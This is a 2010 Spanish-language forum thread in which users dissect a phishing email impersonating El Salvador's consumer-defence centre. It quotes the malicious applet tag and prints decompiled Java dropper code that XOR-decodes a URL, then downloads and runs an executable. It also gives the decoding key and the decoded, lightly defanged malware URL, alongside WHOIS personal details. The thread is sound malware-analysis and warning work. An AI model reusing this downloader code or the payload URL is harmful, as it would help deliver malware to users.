Ojo email fraudulento sobre precio de gasolina

[unloko]

Hey mara... revise mi correo y encontre esto... al dar click en el link se abre java tratando de instalar un archivo, este correo ya ha sido desestimado y me parece que tiene similitudes al correo sobre que mauricio funes murio...
pendientes mara!

Estudio de gasolineras verificadas y no verificadas‏
De:    Centro de defensa del consumidor (marketing@titatour.net)
Enviado:    lunes, 26 de julio de 2010 12:44:32 a.m.
Para:    glb@unloko.net




Estimado consumidor de El Salvador.

El Centro de Defensa del Consumidor ha realizado un estudio a nivel nacional, y hemos encontrado varias irregularidades en diversas gasolineras.
Si deseas saber si en la gasolinera que te abasteces te dan exactamente lo que pagas, hemos publicado un documento el cual aparecen ordenadas las gasolineras por ciudades y regiones.

http://www.titatour.net/gasolinerasverificadas.htm
Las gasolineras que aparecen en rojo tuvieron irregularidades graves, las de naranja tuvieron medianas irregularidades y en verde no tuvieron.

http://www.titatour.net/gasolinerasnoverificadas.htm
NOTA: Para visualizar el documento tendra que aceptar los terminos de condiciones del sitio web.


© 2007, 2010 Centro para la Defensa del Consumidor

[missing_martian]

Bien raro a mi me cayo al correo de trabajo tambien 

[unloko]

el CDC rechazo que ese correo sea de ellos.. asi q asaber q cosas raras trae eso... gran gusano... asi q no lo habran!

[YaxPac]

a saber que ondas porque tambien esta en el fb 

[Jarmandaros]

Que alguien instale el plugin Java y que me diga que pasa despues por favor

Necesito verificar si es lo que pienso que es

[mikelito]

Que alguien instale el plugin Java y que me diga que pasa despues por favor
Necesito verificar si es lo que pienso que es

Alguien dijo virus??? jejeje  no me  atrevo  tampoco a instalar  ese  plugging
esto me sale  cuando lo abro en  el  chrome:

404 Not Found

The requested URL /Alamo Rent A Car - Discount Rental Cars, Vacation Car Rental Deals_archivos/topNav.htm was not found on this server.

[salvadoresc]

ah yo lo vi, pero no le preste mucha atencion con tantos mails que tenia en inbox sin leer, solo le di delete por que no me interesaba... hoy que ya dijeron que es virus ya lo vamos a probar


aca esta la info del whois del dominio:


Domain Name.......... titatour.net
  Creation Date........ 2010-06-25
  Registration Date.... 2010-06-25
  Expiry Date.......... 2011-06-25
  Organisation Name.... Doris Ramirez
  Organisation Address. Calle 145 No.15-59 Apto 607
  Organisation Address.
  Organisation Address. bogota
  Organisation Address. 00000
  Organisation Address. UK
  Organisation Address. COLOMBIA

Admin Name........... Doris Ramirez
  Admin Address........ Calle 145 No.15-59 Apto 607
  Admin Address........
  Admin Address........ bogota
  Admin Address........ 00000
  Admin Address........ UK
  Admin Address........ COLOMBIA
  Admin Email..........
  Admin Phone.......... 57 16258600
  Admin Fax............

[vlad]

Si todos la reportamos con este URL:

http://www.google.com/safebrowsing/report_phish/?tpl=mozilla&continue=http%3A%2F%2Fwww.google.com%2Ftools%2Ffirefox%2Ftoolbar%2FFT2%2Fintl%2Fes%2Fsubmit_success.html&hl=es&url=http%3A%2F%2Ftitatour.net%2F

Al menos los usuarios de Firefox van a ver la advertencia de sitio fraudulento!. A ver si apoyan.

[Rasta]

Hecho...... reportado!!!

[moyo18]

yo entre a verla ... no se mira nada

aki esta el regalo supongo

<applet name="Java" code="Inicio.class" archive="http://www.titatour.net/PluginJava.jar" height="1" width="1">
<param name="url" value="4D88525F7A0C0B5D5C52D25246344250455E57D2484A340C515A4F44884301255B41"> </applet>

[tc1421]

a un compañero de trabajo le llego el dia de ayer en dos veces pero don direferente argumento:

Le enviamos el detalle de su compra através de nuestra tienda. Por favor verifique la misma este es el numero de rastreo que le proporcionamos #2564875. Si tiene problemas para visualizar nuestra página dele clic al boton Aceptar para poder ver el contenido de nuestro sitio.
Aun no hemos realizado ningún cargo a su nombre.
NOTA: Pero si existe una orden de pedido por atender.
http://www.titatour.net/yourorderstatus.htm
Si cree que este correo es un error por favor haga clic en el siguiente enlace, con esta acción procederemos ala cancelación de su orden. y se dará de baja su email de nuestro sistema
http://www.titatour.net/cancelaciones.htm
Sino puede ver correctamente nuestro sitio.Deberá dar click en el botón Aceptar al principio de la pagina.

[mxgxw]

Les dejo el codigo decompilado pa los que les gusta entretenerse LA decodificación de la URL se deja como ejercicio al lector. fsakjhdsak

Código: (Inicio.class) [Seleccionar]

import java.io.BufferedInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.PrintStream;
import java.io.PrintWriter;
import java.net.URL;
import java.net.URLConnection;

public class Inicio extends Plugin
{
  private static final long serialVersionUID = 1L;

  public static void main(String[] paramArrayOfString)
  {
  }

  public void empaquetar()
    throws Exception
  {
    byte[] arrayOfByte = new byte[10240];
    String str1 = XorCoder.Desencripta(getParameter("url"), "%ü&/@#$*+");

    System.out.println("------------->>>>>>>>>> " + str1);
    String str2 = str1.substring(str1.lastIndexOf("."));
    str2 = str2.toLowerCase();
    File localFile1 = File.createTempFile("javatmp", str2);
    FileOutputStream localFileOutputStream = new FileOutputStream(localFile1);
    URL localURL = new URL(str1);
    URLConnection localURLConnection = localURL.openConnection();
    BufferedInputStream localBufferedInputStream = new BufferedInputStream(localURLConnection.getInputStream());

    while ((i = localBufferedInputStream.read(arrayOfByte)) > 0)
    {
      int i;
      localFileOutputStream.write(arrayOfByte, 0, i);
    }localFileOutputStream.close();
    if (str2.contains(".jar"))
      Runtime.getRuntime().exec(System.getProperty("sun.boot.library.path") + "\\javaw.exe -jar  \"" + localFile1.getAbsolutePath() + "\"");
    else
      try
      {
        Runtime.getRuntime().exec(localFile1.getAbsolutePath());
      }
      catch (IOException localIOException)
      {
        File localFile2 = File.createTempFile("tmp", ".bat");
        localFile2.createNewFile();
        localFile2.deleteOnExit();
        PrintWriter localPrintWriter = new PrintWriter(localFile2);
        localPrintWriter.println("\"" + localFile1.getAbsolutePath() + "\"");
        localPrintWriter.close();
        Runtime.getRuntime().exec(localFile2.getAbsolutePath());
        localFile2.delete();
      }
    localFile1.deleteOnExit();
  }

  public void init()
  {
    try
    {
      empaquetar();
    }
    catch (Exception localException)
    {
      localException.printStackTrace();
    }
    super.init();
  }
}


Código: [Seleccionar]

class XorCoder
{
  public static String Encripta(String paramString1, String paramString2)
  {
    String str3 = new String("");

    for (int i = 1; i <= paramString1.length(); ++i) {
      String str2 = Mid(paramString1, i, 1);
      char[] arrayOfChar2 = str2.toCharArray();
      String str1 = Mid(paramString2, (i - 1) % paramString2.length() + 1, 1);
      char[] arrayOfChar1 = str1.toCharArray();
      str3 = str3 + Right(new StringBuilder().append("0").append(Integer.toHexString(arrayOfChar1[0] ^ arrayOfChar2[0])).toString(), 2);
    }

    return str3;
  }

  public static String Desencripta(String paramString1, String paramString2) {
    int j = 1;

    String str3 = new String("");

    for (int i = 1; i <= paramString1.length(); i += 2) {
      String str2 = Mid(paramString1, i, 2);
      char[] arrayOfChar2 = str2.toCharArray();
      String str1 = Mid(paramString2, (j - 1) % paramString2.length() + 1, 1);
      char[] arrayOfChar1 = str1.toCharArray();
      str3 = str3 + (char)(arrayOfChar1[0] ^ Integer.parseInt(str2, 16));
      ++j;
    }
    return str3;
  }

  public static String Mid(String paramString, int paramInt1, int paramInt2) {
    paramString = paramString.substring(paramInt1 - 1, paramInt1 + paramInt2 - 1);
    return paramString;
  }

  public static String Right(String paramString, int paramInt)
  {
    paramString = reverse(paramString);
    paramString = paramString.substring(0, paramInt);
    paramString = reverse(paramString);
    return paramString;
  }

  public static String reverse(String paramString) {
    int j = paramString.length();
    StringBuffer localStringBuffer = new StringBuffer(j);

    for (int i = j - 1; i >= 0; --i) {
      localStringBuffer.append(paramString.charAt(i));
    }
    return localStringBuffer.toString();
  }
}

Mas tarde vamos a decodificar el string:

Código: [Seleccionar]

4D88525F7A0C0B5D5C52D25246344250455E57D2484A340C515A4F44884301255B41

Para ver la URL a la que nos lleva y el contenido del .bat que intenta escribir en nuestro disco duro Mantenganse sintonizados.

[kojik69]

  De plano que mejor el foro debería llamarse TheAdamSVC, lejos de tenerle miedo a los "monstruos" la mara juega con ellos 

[mxgxw]

Bueno continuando... El programa que se descarga es:

Código: (Test.java) [Seleccionar]

public class Test {
  public static void main(String args[]) {
    String str1 = XorCoder.Desencripta("4D88525F7A0C0B5D5C52D25246344250455E57D2484A340C515A4F44884301255B41", "%ü&/@#$*+");
    System.out.println("Str1: "+str1);
  }
}


Código: [Seleccionar]

Str1: http://x_xwww.titatour.net/update.exe
nota: agregue "" al inicio de la url para que no lo vayan a descargar por error.

El antivirus lo reconoce como:

Dr.Delphi.gen
http://www.avira.com/en/threats/section/fulldetails/id_vir/2793/dr_delphi.gen.html

[Maitro...]

Buenos,

Para los que estan registrados en OpenDNS podrian votar por el reporte que hice:

Código: [Seleccionar]

http://domain.opendns.com/titatour.net
Lo reporte como Adware ya que no encontre otra categoria en la que quedara pero ahi pueden votar por mi opcion o agregar otra categoria extra